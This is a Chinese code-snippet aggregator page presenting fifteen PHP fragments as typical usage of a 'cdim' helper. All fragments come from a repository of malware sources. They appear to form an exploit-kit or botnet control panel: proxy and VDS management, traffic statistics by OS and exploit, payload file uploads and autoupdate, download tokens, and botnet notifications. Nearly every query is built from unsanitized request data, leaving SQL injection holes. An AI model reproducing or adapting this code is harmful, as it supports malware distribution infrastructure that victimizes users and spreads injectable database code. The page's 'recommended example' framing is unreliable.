当前位置: 首页>>代码示例>>PHP>>正文


PHP cdim函数代码示例

本文整理汇总了PHP中cdim函数的典型用法代码示例。如果您正苦于以下问题:PHP cdim函数的具体用法?PHP cdim怎么用?PHP cdim使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了cdim函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的PHP代码示例。

示例1: delProxy

function delProxy($id, $url = '')
{
    global $config;
    cdim('db', 'query', 'DELETE FROM `proxy` WHERE `id` = ' . $id);
    $ex = strpos($url, '?') === false ? '?' : '&';
    $url = $url . $ex . 'del=true&delpass=' . DELPASS;
    $qq = get_web_page($url);
    //file_put_contents('bbb.bbb', 'checkurl4u.php->DEL PROXY'."\r\n\r\n", FILE_APPEND);
}
开发者ID:insecuritea,项目名称:malware_sources,代码行数:9,代码来源:checkurl4u82472835273762.php

示例2: os2exp

function os2exp($os, $flow_id)
{
    global $config;
    $resultOS = cdim('db', 'query', "SELECT COUNT(*) as cnt, os FROM `traff` WHERE user_id = " . $config['user']['id'] . " AND flow_id = " . $flow_id . " AND os = '" . $os . "' AND `exp` != '' GROUP BY os ORDER BY cnt DESC LIMIT 10");
    if (!isset($resultOS[0])) {
        return 0;
    }
    return $resultOS[0]->cnt;
}
开发者ID:insecuritea,项目名称:malware_sources,代码行数:9,代码来源:p_stats.php

示例3: getUserDataFromToken

function getUserDataFromToken($token)
{
    // стоит хранить токены в базе, но мне лень, так что пройдемся по пользователям
    $users = cdim('db', 'query', "SELECT u.id as id, u.user_login as user_login, f.file_id, f.last_token, f.id as flow_id FROM `users` AS u LEFT JOIN `flows` AS f ON u.id = f.user_id");
    if (isset($users)) {
        foreach ($users as $k => $v) {
            if (md5($v->last_token . $v->id . $v->user_login) == $token) {
                return $v;
            }
        }
    }
    return false;
}
开发者ID:insecuritea,项目名称:malware_sources,代码行数:13,代码来源:download.php

示例4: getUserExeAsSelectOptions

function getUserExeAsSelectOptions($file_id)
{
    global $config;
    $exe = cdim('db', 'query', "SELECT * FROM `files` WHERE user_id = " . $config['user']['id']);
    if ($file_id == NULL) {
        $sel = 'selected';
    } else {
        $sel = '';
    }
    $out = '<option value="empty" ' . $sel . '>--- select file ---</option>';
    $sel = '';
    if (isset($exe)) {
        foreach ($exe as $k => $v) {
            if ($file_id == $v->id) {
                $sel = 'selected';
            } else {
                $sel = '';
            }
            $out .= '<option value="' . $v->id . '" ' . $sel . '>' . $v->filename . '</option>';
        }
    }
    return $out;
}
开发者ID:insecuritea,项目名称:malware_sources,代码行数:23,代码来源:p_flows.php

示例5: cdim

// подключаем функции
include_once '../../gears/di.php';
// подключаем класс библиотеки класов
include_once '../../gears/db.php';
// подключаем класс базы
// создаем подключение к базе
cdim('db', 'connect', $config);
// забираем из базы опции и кладем их в конфиг
$options = cdim('db', 'query', "SELECT * FROM options");
// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
$user_id = intval($_POST['user_id']);
$query = explode(",", trim($_POST['query'], ","));
$query = array_unique($query, SORT_NUMERIC);
// удаляем все для этого пользователя
cdim('db', 'query', "DELETE FROM `proxy2users` WHERE `user_id` = " . $user_id . ";");
// если все выделения убраны то получаем 0
if ($query[0] == 0) {
    exit(json_encode(array('type' => 'ok', 'msg' => '')));
}
// добавляем заново
foreach ($query as $k => $v) {
    cdim('db', 'query', "INSERT INTO `proxy2users` VALUES ('" . $v . "','" . $user_id . "', NULL);");
}
exit(json_encode(array('type' => 'ok', 'msg' => '')));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:updateProxy.php

示例6: name

      </div>
      <div class="modal-body">
		<div class="progress progress-striped active">
		  <div class="bar" style="width: 100%;"></div>
		</div>
		<h4 class="text-center">wait...</h4>
      </div>
    </div>
  </div>
</div>

<table class="listing">
<thead><tr><th>Host name (with path)</th><th>description</th><th>AV</th></tr></thead>
<tbody>
	<?php 
$vps = cdim('db', 'query', "SELECT * FROM `proxy` ORDER BY `id` ASC");
if (isset($vps)) {
    foreach ($vps as $k => $v) {
        echo '
					<tr class="rig_line" data-rigLineId="' . $v->id . '">
						<td class="rig_line_1"width="60%"><span>Host name (with path)</span><input style="width:99%;" value="' . $v->url . '"></td>
						<td class="rig_line_2"><input style="width:99%;" value="' . $v->description . '"></td>
						<td><strong class="btn btn-info" onClick="checkUrlAV(' . $v->id . ');">check</strong></td>
					</tr>
				';
    }
}
?>

</tbody>
</table>
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:p_proxy.php

示例7: addVDSLine

	}

	function addVDSLine() {
		var trCount = parseInt($('.listing tbody tr :last').attr('data-rigLineId'))+1;
		if (!trCount) trCount = 1;
		var line = '<tr class="rig_line" data-rigLineId="'+trCount+'"><td class="rig_line_1" width="60%"><span>VDS IP</span><input style="width:99%;"></td><td class="rig_line_2"><input style="width:99%;"></td></tr>';		
		$('.listing tbody').append(line);
	}	

</script>

<table class="listing">
<thead><tr><th>VDS URL</th><th>description</th></tr></thead>
<tbody>
	<?php 
    $vds = cdim('db', 'query', "SELECT * FROM `vds` ORDER BY `id` ASC");
    if (isset($vds)) {
        foreach ($vds as $k => $v) {
            echo '
					<tr class="rig_line" data-rigLineId="' . $v->id . '">
						<td class="rig_line_1"width="60%"><span>VDS URL</span><input style="width:99%;" value="' . $v->ip . '"></td>
						<td class="rig_line_2"><input style="width:99%;" value="' . $v->description . '"></td>
					</tr>
				';
        }
    }
    ?>

</tbody>
</table>
<small>To delete, just leave host url field empty</small><br>
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:p_vds.php

示例8: errorHandler

        errorHandler(E_ERROR, $last_error['message'], $last_error['file'], $last_error['line']);
    }
}
set_error_handler('errorHandler');
register_shutdown_function('fatalErrorShutdownHandler');
include_once '../../config.php';
// берем конфиг
include_once '../../gears/functions.php';
// подключаем функции
include_once '../../gears/di.php';
// подключаем класс библиотеки класов
include_once '../../gears/db.php';
// подключаем класс базы
// создаем подключение к базе
cdim('db', 'connect', $config);
// забираем из базы опции и кладем их в конфиг
$options = cdim('db', 'query', "SELECT * FROM options");
// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
$user_id = intval($_POST['user_id']);
if ($config['user']['rights']['rolename'] != 'admin') {
    exit(json_encode(array('type' => 'error', 'msg' => 'Только админ может сбрасывать сесси пользователей!')));
}
cdim('db', 'query', "UPDATE `users` SET `sid` = '' WHERE `id` = " . $user_id . ";");
exit(json_encode(array('type' => 'ok', 'msg' => '')));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:dropSid.php

示例9: cdim

include_once '../../gears/db.php';
// подключаем класс базы
// создаем подключение к базе
cdim('db', 'connect', $config);
// забираем из базы опции и кладем их в конфиг
$options = cdim('db', 'query', "SELECT * FROM options");
// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
if ($config['user']['rights']['rolename'] != 'admin') {
    exit('Hacking attempt');
}
//cdim('db','query',"TRUNCATE TABLE proxy");
if (!is_array($_POST['data'])) {
    exit(json_encode(array('type' => 'error', 'msg' => 'Что-то пошло не так!')));
}
foreach ($_POST['data'] as $k => $v) {
    $proxy = cdim('db', 'query', "SELECT * FROM `proxy` WHERE `url` = '" . $v . "';");
    // новая прокся
    if (!isset($proxy)) {
        cdim('db', 'query', "INSERT INTO `proxy` VALUES ('', '" . $v . "', '', 0);");
    } else {
        cdim('db', 'query', "UPDATE `proxy` SET `last_check` = 0 WHERE `url` = '" . $v . "';");
    }
}
exit(json_encode(array('type' => 'success', 'msg' => 'Серверы проксирования обновлены')));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:saveMassPROXY.php

示例10: set_error_handler

    }
}
set_error_handler('errorHandler');
register_shutdown_function('fatalErrorShutdownHandler');
include_once '../../config.php';
// берем конфиг
include_once '../../gears/functions.php';
// подключаем функции
include_once '../../gears/di.php';
// подключаем класс библиотеки класов
include_once '../../gears/db.php';
// подключаем класс базы
// создаем подключение к базе
cdim('db', 'connect', $config);
// забираем из базы опции и кладем их в конфиг
$options = cdim('db', 'query', "SELECT * FROM options");
// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
if ($config['user']['rights']['rolename'] != 'admin') {
    exit('Hacking attempt');
}
foreach ($_POST as $k => $v) {
    cdim('db', 'query', "UPDATE `options` SET  `option_value` =  '" . $v . "' WHERE `option_name` = '" . $k . "';");
}
exit;
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:saveAdminOptions.php

示例11: set_error_handler

}
set_error_handler('errorHandler');
register_shutdown_function('fatalErrorShutdownHandler');
include_once '../../config.php';
// берем конфиг
include_once '../../gears/functions.php';
// подключаем функции
include_once '../../gears/di.php';
// подключаем класс библиотеки класов
include_once '../../gears/db.php';
// подключаем класс базы
// создаем подключение к базе
cdim('db', 'connect', $config);
// забираем из базы опции и кладем их в конфиг
$options = cdim('db', 'query', "SELECT * FROM options");
// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
$user_id = intval($_POST['user_id']);
$pass = md5($_POST['pass']);
if ($config['user']['rights']['rolename'] != 'admin' && $config['user']['id'] != $user_id) {
    exit(json_encode(array('type' => 'error', 'msg' => 'Пытаемся менять не свой пароль!')));
}
// обновляем
cdim('db', 'query', "UPDATE `users` SET `user_pass` = '" . $pass . "' WHERE `id` = " . $user_id . ";");
exit(json_encode(array('type' => 'ok', 'msg' => '')));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:changeUserPass.php

示例12: cdim

// подключаем функции
include_once '../../gears/di.php';
// подключаем класс библиотеки класов
include_once '../../gears/db.php';
// подключаем класс базы
// создаем подключение к базе
cdim('db', 'connect', $config);
// забираем из базы опции и кладем их в конфиг
$options = cdim('db', 'query', "SELECT * FROM options");
// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
// убираем все нотифаи старше 5 минут
cdim('db', 'query', "DELETE FROM `notifyQueue` WHERE `timeBirth` < UNIX_TIMESTAMP(NOW())-300;");
$res = cdim('db', 'query', "SELECT * FROM `botnets` WHERE `user_id` = '" . $config['user']['id'] . "' ORDER BY `botnetname` ASC;");
// проверяем наш ли ботнет
if (isset($res[0])) {
    foreach ($res as $k => $v) {
        $tasks = cdim('db', 'query', "SELECT * FROM `notifyQueue` WHERE `botnetname` = '" . $v->botnetname . "';");
        if (isset($tasks[0])) {
            cdim('db', 'query', "DELETE FROM `notifyQueue` WHERE `id` = " . $tasks[0]->id . ";");
            exit(json_encode(array('type' => 'info', 'msg' => 'Bot: ' . $tasks[0]->botid . '<br>From: ' . $tasks[0]->botnetname . '<br>' . $tasks[0]->msg)));
        }
    }
}
exit(json_encode(array('type' => 'none', 'msg' => '')));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:checkNotify.php

示例13: exit

        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
if ($config['user']['rights']['rolename'] != 'admin') {
    exit('Hacking attempt');
}
//cdim('db','query',"TRUNCATE TABLE vds");
foreach ($_POST as $k => $v) {
    // убиваем
    if ($v['ip'] === '') {
        cdim('db', 'query', "DELETE FROM `vds` WHERE `id` = '" . $v['id'] . "';");
        continue;
    }
    $vds = cdim('db', 'query', "SELECT * FROM `vds` WHERE `id` = " . $v['id'] . ";");
    // новая прокся
    if (!isset($vds)) {
        cdim('db', 'query', "INSERT INTO `vds` VALUES ('', '" . $v['ip'] . "', '" . $v['description'] . "');");
        // надо знать id последней записи
        $pdoLink = $di->objects['db']->getVar('link');
        $bdId = $pdoLink->lastInsertId();
    } else {
        cdim('db', 'query', "UPDATE `vds` SET `ip` = '" . $v['ip'] . "', `description` = '" . $v['description'] . "' WHERE `id` = " . $v['id'] . ";");
        $lastUpdateId = $v['id'];
    }
}
if (!isset($bdId)) {
    $bdId = $lastUpdateId;
}
exit(json_encode(array('type' => 'success', 'msg' => 'Серверы VDS обновлены', 'vds_id' => $bdId)));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:saveVDS.php

示例14: foreach

// кладем в конфиг все что забрали из базы (все опции)
if (isset($options)) {
    foreach ($options as $k => $v) {
        $config['options'][$v->option_name] = $v->option_value;
    }
}
// авторизация
include_once '../auth/auth.php';
$file_id = is_numeric($_GET['file_id']) ? intval($_GET['file_id']) : false;
if ($file_id === false) {
    exit(json_encode(array('type' => 'success', 'msg' => 'Файл отсутствует')));
}
$xf = cdim('db', 'query', "SELECT `filename` FROM `files` WHERE `id` = " . $_GET['file_id'] . " AND `user_id` = " . $config['user']['id'] . " LIMIT 1;");
if (isset($xf[0])) {
    $autoupdate_url = isset($_POST['autoupdate_url']) ? addslashes($_POST['autoupdate_url']) : '';
    $autoupdate_filename = isset($xf[0]->filename) ? addslashes($xf[0]->filename) : '';
    $autoupdate_user_id = isset($config['user']['id']) ? (int) $config['user']['id'] : 0;
    $autoupdate_runfile = '../autoupdate/autoupdate_runfile_' . $autoupdate_user_id;
    $a_file_arr = array();
    if (file_exists($autoupdate_runfile)) {
        $a_filedata = @file_get_contents($autoupdate_runfile);
        if ($a_filedata !== FALSE) {
            $a_file_arr = unserialize($a_filedata);
        }
    }
    unset($a_file_arr[$autoupdate_filename]);
    @file_put_contents($autoupdate_runfile, serialize($a_file_arr));
}
$file = cdim('db', 'query', "UPDATE `flows` SET `file_id` = NULL, `last_token` = 0 WHERE `file_id` = " . $_GET['file_id'] . " AND `user_id` = " . $config['user']['id'] . ";");
$file = cdim('db', 'query', "DELETE FROM `files` WHERE `id` = " . $_GET['file_id'] . " AND `user_id` = " . $config['user']['id'] . ";");
exit(json_encode(array('type' => 'success', 'msg' => 'File Deleted')));
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:fileDelete.php

示例15: cdim

cdim('db', 'connect', $config);
$allfiles_data = array();
if (count($all_files) > 0) {
    foreach ($all_files as $filename) {
        $tmp_arr = explode('_', $filename);
        $u_id = (int) $tmp_arr[count($tmp_arr) - 1];
        $f_data = @file_get_contents($filename);
        if ($f_data !== FALSE) {
            $f_data = @unserialize($f_data);
            $allfiles_data[$u_id] = $f_data;
        }
    }
}
$update_files_arr = array();
if (count($allfiles_data) > 0) {
    $res = cdim('db', 'query', 'SELECT `id`, `user_id`, `filename` FROM `files`');
    // WHERE `user_id` = ".$config['user']['id']
    foreach ($res as $k => $v) {
        if (isset($allfiles_data[$v->user_id][$v->filename])) {
            $update_files_arr[$v->id]['user_id'] = $v->user_id;
            $update_files_arr[$v->id]['url'] = $allfiles_data[$v->user_id][$v->filename];
        }
    }
}
unset($f_data);
unset($allfiles_data);
if (count($update_files_arr) > 0) {
    foreach ($update_files_arr as $num => $val) {
        $url = $val['url'];
        //echo($num.'---url:'.$url.'<br>');
        if (strlen($url) > 1) {
开发者ID:insecuritea,项目名称:malware_sources,代码行数:31,代码来源:autoupdate_start.php


注:本文中的cdim函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。